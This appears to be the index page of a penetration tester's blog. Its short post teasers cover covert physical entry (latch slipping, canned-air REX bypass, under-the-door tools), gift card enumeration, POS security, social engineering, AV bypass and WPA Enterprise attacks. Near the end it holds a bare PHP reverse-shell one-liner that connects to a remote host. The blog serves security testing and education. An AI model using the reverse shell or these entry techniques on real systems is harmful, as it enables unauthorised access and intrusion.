Tim Roberts and I had a great discussion with Patrick from the social engineering-focused Layer 8 Conference. Not long ago, I made a post on Twitter asking which topics, tools, techniques others might like to have me write a blog post about. There were some great responses, such as “what do you do when you’re … More Layer 8 Social Engineering Conference – Podcast
Opening a locked door with just a piece of plastic is just as bad and simple as it sounds. If a lock is not equipped with, or has a deadlatch button that’s improperly configure, it’s very easy and quick to slip the latch and let yourself in. In the following videos, you’ll see where I … More Open a locked door with a piece of plastic
Bypassing Request-to-Exit (REX) sensors with canned air and other mediums isn’t a new attack, and is widely used as a covert method of entry. However, there are times where this attack could be possible, but certain elements such as a small physical gap that the straw can’t fit through, REX sensor being farther away, etc., … More Improved Canned Air Attacks Against REX Sensors
To better understand how it is possible to hack gift cards, we’ll demonstrate weaknesses with gift cards, balance checking, and how hackers can enumerate gift cards even without knowing the card holder. It is important to explain that the technique can be applied to any gift card that’s not using a CAPTCHA or a pin, … More Hacking Gift Cards
Recently, we assessed two point-of-sale (POS) systems for clients in different industries – Retail and Restaurants. POS systems are the latest and greatest hacking target taking place around the nation. In the last couple of years, we’ve read a lot about big organizations being hacked and credit card information stolen. In these instances, terminals from the … More Point-of-Sale System Security Analysis : How hackers gain access to POS systems in retail and restaurants
This has been an issue for several years and even as I scroll through my social media feeds, I still come across things like this: If you were to look at the comments at good ole Kermit’s request, you would see several selfies of people with their work ID’s draped clearly across their necks. “What … More Badges on Social Media
If you’re not familiar with the Under-the-Door (UtDT), it’s a device that fits between the physical gap at the bottom of doors, is then rotated upwards, grasps the lever-style door handle, pulls down and opens the door from the inside. It’s very easy to use, and is publicly available for purchase. Lever Handle: Under-the-Door tool: … More Protecting from the Under-the-Door Tool
One of a company’s most important responsibilities is to know its network footprint. Many large corporations are compartmentalized, and different groups have different responsibilities that rarely overlap. It’s not uncommon for a company to have multiple class-C IP address ranges, along with third-party hosted websites, and not really realize they exist within the organization’s assets. … More Internet Enumeration and Discovery – Know Your Network Footprint
Make an Incomplete Nmap Scan .xml File Usable for Rawr and Other Applications That Accept .csv File-types This is a very non-technical how-to for newcomers who have found themselves in a situation where for some reason or another, their Nmap scan wasn’t able to complete. This can be a problem when you were planning on feeding … More Make an Incomplete Nmap .xml File Usable Again
As a pentester and former street magician, I have used distraction and trickery to divert the attention of a target, mostly through social engineering. This has helped me professionally and during parties. A 2014 article written by Kacey Henley lists some of the old fashioned short and long cons (albeit names vary) that still work … More 10 Classic Cons
A great reference for things to consider about electronic locks. … More Electronic Locks
Running Nethunter from my automobile’s touchscreen dash. … More Auto-Mobilizing NetHunter
Just one of many useful ways to bypass AV when attempting to drop a metasploit payload. … More Bypass AV using .NET payload
Using the hostapd-wpe toolset is the easiest way to run an attack against WPA Enterprise implementations as everything is already built-in. The attack requires a compatible wireless card. The hostapd-wpe version has been updated from 2.1/2.2 to 2.6, which now allows for 802.11n/ac traffic as long as it’s supported by your card… https://www.offensive-security.com/penetration-testing/hacking-wpa-enterprise-with-kali-linux
php -r ’$sock=fsockopen(“10.0.0.1”,1234);exec(“/bin/sh -i <&3 >&3 2>&3”);’
How to override your hotel’s thermostat and disable the motion sensor to it as well: http://viewfromthewing.boardingarea.com/2013/11/10/override-hotels-thermostat-controls-make-cool-hot-youd-like/
We Hack People - Covert Entry 
You must be logged in to post a comment.